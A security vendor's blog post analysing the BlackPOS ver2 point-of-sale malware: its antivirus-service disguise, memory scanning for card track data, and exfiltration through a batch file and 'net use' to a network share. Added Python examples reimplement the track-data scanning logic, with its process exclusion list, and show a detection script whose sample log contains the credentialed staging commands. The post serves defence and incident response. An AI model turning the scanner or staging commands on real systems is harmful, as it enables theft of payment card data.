Trend Micro TrendLabs Malware Blog
    We recently spotted a brand new BlackPOS (point-of-sale) malware, detected by Trend Micro as TSPY_MEMLOG.A. In 2012 the source code of BlackPOS was leaked, enabling other cybercriminals and attackers to enhance its code. What is interesting about TSPY_MEMLOG.A is that it disguises itself as an installed service of a known AV vendor's software, so that it is not noticed and consequently deleted from the infected PoS systems. This routine differs from earlier PoS malware such as TSPY_POCARDL.U and TSPY_POCARDL.AB (BlackPOS), which instead hid behind the targeted company's own installed service.

    The malware can be run with the options -start, -stop, -install and -uninstall. The -install option registers the malware as a Windows service named "<AV_Company> Framework Management Instrumentation" (the vendor name is withheld here), and -uninstall deletes that service. The RAM-scraping routine starts as a thread when the installed service starts; the malware only runs its main routine once it has been successfully registered as a service, so a copy that is merely executed without -install does not begin scraping.

    Apart from masquerading as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process-iteration function: it uses the CreateToolhelp32Snapshot API to list and iterate over all running processes, whereas BlackPOS variants typically use EnumProcesses for this.

    After it has read process memory and matched track data, it drops and runs a batch component, t.bat. Track data is where the information needed to carry out a card transaction is located; on the card it is stored on the magnetic stripe or in the embedded chip.

    The data is eventually written out to a file named McTrayErrorLogging.dll. This mirrors what happened in the PoS malware attack on the retailer Target in December 2013.

     

    Figure 1. CreateToolhelp32Snapshot to enumerate processes

    Based on our analysis, this PoS malware uses a new custom search routine to check RAM for track data; such custom routines have replaced the regex search seen in earlier PoS malware. It reads 0x20000 (131,072) bytes per pass and keeps scanning until it has covered the entire memory region of the process being inspected.

    Figure 2. Screenshot of reading process memory

    Figure 3. Logging of data

    It has an exclusion list of processes in which track data is not expected, and it skips them. It gathers track data by scanning the memory of all running processes except the following:

    • smss.exe
    • csrss.exe
    • wininit.exe
    • services.exe
    • lsass.exe
    • svchost.exe
    • winlogon.exe
    • sched.exe
    • spoolsv.exe
    • System
    • conhost.exe
    • ctfmon.exe
    • wmiprvse.exe
    • mdm.exe
    • taskmgr.exe
    • explorer.exe
    • RegSrvc.exe
    • firefox.exe
    • chrome.exe

    Skipping a fixed set of processes in this way is similar to what VSkimmer (detected as BKDR_HESETOX.CC) does.
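To make the scanning behaviour described above concrete, here is an added Python example (not code from this post, and not the malware's own routine) that models the 0x20000-byte read loop over a process memory region together with the exclusion list of processes that are never scanned. The track layouts, the regular expressions, the Luhn filter and the "memory snapshot" built from the public test card numbers 4111111111111111 and 5555555555554444 are my own assumptions and constructed input; the post does not disclose how the custom search routine actually matches track data. The example also shows an edge case that the chunked read raises: a record straddling a chunk boundary is missed unless consecutive reads overlap.

```python
import re

# Exclusion list from the post: the malware never scans these processes.
EXCLUDED = {
    "smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe",
    "svchost.exe", "winlogon.exe", "sched.exe", "spoolsv.exe", "System",
    "conhost.exe", "ctfmon.exe", "wmiprvse.exe", "mdm.exe", "taskmgr.exe",
    "explorer.exe", "RegSrvc.exe", "firefox.exe", "chrome.exe",
}

CHUNK = 0x20000   # bytes read per pass, as described in the post
MAX_RECORD = 128  # assumption: longest track record; reused as chunk overlap

# Assumed matching rules (the post does not give the malware's own).
# Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary>?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^^]{2,26})\^(\d{4})(\d{3})[^?]*\?")
# Track 2: ;<PAN>=<YYMM><service code><discretionary>?
TRACK2 = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})\d*\?")


def luhn_ok(pan: bytes) -> bool:
    """Reject digit runs that are not valid card numbers (Luhn mod-10)."""
    total = 0
    for i, ch in enumerate(reversed(pan.decode("ascii"))):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def scan_region(region: bytes, chunk: int = CHUNK, overlap: int = MAX_RECORD):
    """Yield (offset, track_no, pan) for each track record in one memory
    region, reading `chunk` bytes per pass. Each pass starts `overlap`
    bytes before the previous one ended, so a record split across two
    reads is still seen whole; with overlap=0 such a record is missed."""
    seen = set()
    step = max(1, chunk - overlap)
    pos = 0
    while pos < len(region):
        window = region[pos:pos + chunk]
        for track_no, rx in ((1, TRACK1), (2, TRACK2)):
            for m in rx.finditer(window):
                off = pos + m.start()
                pan = m.group(1)
                if off not in seen and luhn_ok(pan):
                    seen.add(off)
                    yield off, track_no, pan.decode("ascii")
        if pos + chunk >= len(region):
            break
        pos += step


def scan_processes(snapshot: dict, overlap: int = MAX_RECORD) -> list:
    """snapshot maps process name -> list of memory regions (bytes).
    Returns [(process, offset, track_no, pan), ...], skipping EXCLUDED."""
    hits = []
    for proc, regions in snapshot.items():
        if proc in EXCLUDED:
            continue
        for region in regions:
            for off, track_no, pan in scan_region(region, overlap=overlap):
                hits.append((proc, off, track_no, pan))
    return hits


# Constructed test data built from widely published test card numbers.
_T2_VALID = b";4111111111111111=2512101123456789?"      # Luhn-valid
_T2_BAD = b";4111111111111112=2512101123456789?"        # wrong check digit
_T1_VALID = b"%B5555555555554444^DOE/JOHN^2512101000000000?"

SAMPLE_SNAPSHOT = {
    # record deliberately placed 10 bytes before the first chunk boundary
    "pos.exe": [b"\x00" * (CHUNK - 10) + _T2_VALID + b"\x00" * 100],
    # excluded process: holds track data but must never be scanned
    "explorer.exe": [b"\x00" * 64 + _T2_VALID + b"\x00" * 64],
    # one good Track 1 record and one digit run that fails Luhn
    "notepad.exe": [b"junk " + _T1_VALID + b" more " + _T2_BAD],
}

if __name__ == "__main__":
    for hit in scan_processes(SAMPLE_SNAPSHOT):
        print(hit)
    print("without overlap:", scan_processes(SAMPLE_SNAPSHOT, overlap=0))
```

Run as a script it prints the two genuine records (pos.exe and notepad.exe) and shows that, with overlap=0, the record sitting on the 0x20000 boundary in pos.exe disappears. The same loop can be pointed at a process memory dump taken during incident response to confirm whether a PoS process actually held unencrypted track data.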

    In TSPY_MEMLOG.A, the credit card track data grabbed from memory is saved to the file McTrayErrorLogging.dll and sent to a shared location on the same network. We have seen this routine in another BlackPOS/Kaptoxa sample, detected as TSPY_POCARDL.AB. The one difference is that TSPY_MEMLOG.A uses a batch file to move the gathered data to the network share, while TSPY_POCARDL.AB runs the net command directly via cmd.exe. Because the malware carries a specific username for logging into the domain, it is highly likely that the receiving server had already been compromised.

    Data Exfiltration Mechanism

    The malware drops the component t.bat, which is responsible for transferring the data in McTrayErrorLogging.dll to a specific location on the network, t:\temp\dotnet\NDP45-KB2737084-x86.exe (a file name chosen to resemble a .NET Framework 4.5 update package). It uses the following command to transfer the gathered data:

    Figure 4. Screenshot of command used to transfer data

    The net use command maps a drive letter on one machine to a share on another. Here it logs into the domain with a specific, hard-coded username and maps device t: to drive D of the host at 10.44.2.153, so that a plain file copy in the batch file lands on the remote machine.

    In one of the biggest data breaches we saw in 2013, the cybercriminals behind it first offloaded the gathered data to a compromised internal server; a different malware running on that server then uploaded it to an external FTP server. We surmise that this new BlackPOS malware uses the same exfiltration tactic.
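As a detection-side counterpart to the service-name masquerade described earlier and to the batch-file staging above, here is an added Python example (not code from this post) that runs three checks over log records: a newly installed service whose display name ends in "Framework Management Instrumentation" but whose binary sits outside Program Files, a net use that maps a drive letter to a remote share with credentials on the command line, and the file names and MD5 hash given in this post as indicators. The record format, the vendor name, the share name d$, the account and the paths in the sample log are constructed for the example; only the service-name suffix, the address 10.44.2.153, the file names and the hash come from the post, and the Program Files rule is an assumption about where a genuine vendor product installs.

```python
import re

# Indicators taken from the post.
IOC_FILES = {"mctrayerrorlogging.dll", "t.bat", "ndp45-kb2737084-x86.exe"}
IOC_MD5 = {"b57c5b49dab6bbd9f4c464d396414685"}
SERVICE_SUFFIX = re.compile(r"\bFramework Management Instrumentation\s*$", re.I)

# Assumption: a genuine vendor service binary lives under Program Files.
VENDOR_DIR = re.compile(r"^[a-z]:\\program files", re.I)

# net use <drive>: \\<host>\<share> ... /user:<account> ...
NET_USE = re.compile(
    r"\bnet(?:\.exe)?\s+use\s+([a-z]):\s+\\\\([^\s\\]+)\\(\S+).*?/user:(\S+)", re.I)

# Constructed record format: "<timestamp> <event id> key='value' key='value' ..."
FIELD = re.compile(r"(\w+)='([^']*)'")


def parse(line: str) -> dict:
    ts, eid, rest = line.split(" ", 2)
    rec = {"ts": ts, "eid": int(eid)}
    rec.update(FIELD.findall(rest))
    return rec


def check_service(rec: dict):
    """Service install whose name mimics the AV-style name from the post
    but whose image path is not where a vendor product would install."""
    name, path = rec.get("ServiceName", ""), rec.get("ImagePath", "")
    if SERVICE_SUFFIX.search(name) and not VENDOR_DIR.match(path):
        return "service-masquerade"
    return None


def check_ioc(rec: dict):
    """Known file names (in any directory) or the sample's MD5."""
    text = " ".join(rec.get(k, "") for k in ("CommandLine", "ImagePath"))
    names = {tok.split("\\")[-1].lower() for tok in re.findall(r"\S+", text)}
    if names & IOC_FILES:
        return "ioc-filename"
    if rec.get("MD5", "").lower() in IOC_MD5:
        return "ioc-hash"
    return None


def check_net_use(rec: dict):
    """Drive letter mapped to a remote share with explicit credentials:
    the staging step the post describes (t: -> 10.44.2.153 drive D)."""
    if NET_USE.search(rec.get("CommandLine", "")):
        return "net-use-staging"
    return None


RULES = (check_service, check_ioc, check_net_use)


def triage(lines) -> list:
    """Return [(line index, rule name), ...] for every rule that fires."""
    hits = []
    for i, line in enumerate(lines):
        rec = parse(line)
        for rule in RULES:
            tag = rule(rec)
            if tag:
                hits.append((i, tag))
    return hits


# Constructed sample log: paths, vendor name, account and share are invented.
SAMPLE_LOG = [
    "2014-09-04T21:03:10 4688 CommandLine='C:\\Users\\Public\\svc.exe -install' "
    "MD5='b57c5b49dab6bbd9f4c464d396414685'",
    "2014-09-04T21:03:11 7045 ServiceName='Vendor Framework Management Instrumentation' "
    "ImagePath='C:\\Users\\Public\\svc.exe'",
    "2014-09-04T21:03:12 7045 ServiceName='Print Spooler' "
    "ImagePath='C:\\Windows\\System32\\spoolsv.exe'",
    "2014-09-04T21:04:40 4688 CommandLine='cmd.exe /c t.bat'",
    "2014-09-04T21:04:41 4688 CommandLine='net use t: \\\\10.44.2.153\\d$ "
    "/user:CORP\\svc_backup P@ssw0rd'",
    "2014-09-04T21:04:42 4688 CommandLine='cmd.exe /c move McTrayErrorLogging.dll "
    "t:\\temp\\dotnet\\NDP45-KB2737084-x86.exe'",
    "2014-09-04T21:05:01 4688 CommandLine='notepad.exe C:\\Users\\bob\\notes.txt'",
]

if __name__ == "__main__":
    for idx, tag in triage(SAMPLE_LOG):
        print(f"{tag:20s} {SAMPLE_LOG[idx]}")
```

The net use rule is the most durable of the three: file names and hashes change between builds, but a PoS terminal mapping a drive letter to another host's share with a password on the command line is unusual enough to review on its own, which is why it is kept separate from the indicator match.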

    Countermeasures

    PoS malware can arrive on the affected network through the following means:

    • Compromising a point of entry and moving laterally to specific servers
    • Hijacking network communication
    • Infecting machines before they are deployed

    As such, we recommend that enterprises and large organizations implement a multi-layered security solution to ensure their network is protected against vulnerabilities in systems and applications, since these may be used to infiltrate the network. They should also check whether a system component has been modified or replaced, as criminals are using known in-house software applications and services to hide their tracks. IT administrators can use the malware routines and indicators of compromise (IoCs) described in this post to determine whether their network has already been compromised by this new BlackPOS malware. For more information on PoS malware, read our white paper, Point-of-Sale System Breaches: Threats to the Retail and Hospitality Industries.

    Trend Micro protects enterprises from threats like PoS malware by detecting the malicious file.

    The MD5 hash of the sample related to this threat is b57c5b49dab6bbd9f4c464d396414685.

    With additional analysis from Numaan Huq

    Update as of 9:44 AM, September 8, 2014

    During the course of our investigation, we spotted the following anti-American messages embedded in the binary:

    Figure 5. Screenshot of the messages embedded in the binary

    Note that these strings are not used anywhere in the code; we surmise that they may serve as a signature of the group developing this malware.

    Update as of 2:27 PM, September 11, 2014

    Even though BlackPOS ver2 has an entirely different code base from the BlackPOS that compromised Target, it duplicates the data exfiltration technique used by the Target BlackPOS. It is an improved clone of the original, which is why we decided to call it BlackPOS ver2.

    It has also been reported in the press that some security vendors call this malware "FrameworkPOS." This is a play on the service name <AV_Company> Framework Management Instrumentation under which the malware installs itself.





    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice